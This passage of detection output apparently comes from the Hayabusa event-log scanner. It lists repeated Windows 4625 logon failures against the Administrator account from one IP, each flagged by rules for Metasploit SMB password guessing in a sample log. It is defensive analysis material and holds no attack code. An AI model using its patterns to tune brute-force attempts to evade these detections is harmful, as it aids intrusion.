Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5M6oUbT8LvS7JNCq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E4dxHwRQVR7iBWa1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VRygirU257VfFcR5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6H6i0wkjvWkU6cmp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W4Nh7bYfVvx30hVF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GQEsO4GpVjO5xpRh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c9ZlpSBwq0tLAgzm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 65Piip53B1AiSBqb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bh7SfuheoykW7Aym : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tWdm76C4nL6tkU0Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u2WEqTrg3A760Axt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyqhXspTlWwVCwA3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4rkidbQJmvQr35Jg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zr92VsL1YgHVehnL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rQP1K9rHrOyL0TOc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LR783q3o34oLQLTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6NCTNhcghRGWf1qi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CVJdStLdKDbUICyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: luAoVhEj1rOgZBfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OrqmovxoEEjLCaYV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AIP4mDSVhM27IAIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cym5lXDK01XuJz2b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7pYXA1Ic6BOfG31o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b722QrTSVoZGfiK8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NzRFz4L7dpar794B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pLWuw9eMN9rqm0Ic : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sE7pzfiKRfOb2dH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YxL1cV8OiFVRfj4I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHs8Z8XPLg58jZ1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i6kRLlJt3Oxwhdgq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s4kTwriHAKVsTqzB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jfitpZ5ZrzBfpNf6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NdcU6ypEEeIAugGI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jIMfGIU1pHasO88g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MHsxKEQK7CWSqprp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QkC70klP6mv8YZrN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v3YM3zaZk64qqq7K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mOLbk23zOqQLZYZU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v0tlyXqvCQJVqaB5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: npjQlHcGls5gENng : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7buinUqketmW3Ib6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Rs5gYGs6JBf2yV1J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 67hYMvtmbrmv5LHn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtV42zBnWwRCLfJS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jnaPNm28FvbFfM8L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oCEvKO14gPFHAZIA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iJJyXCm1YOI2uIAS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 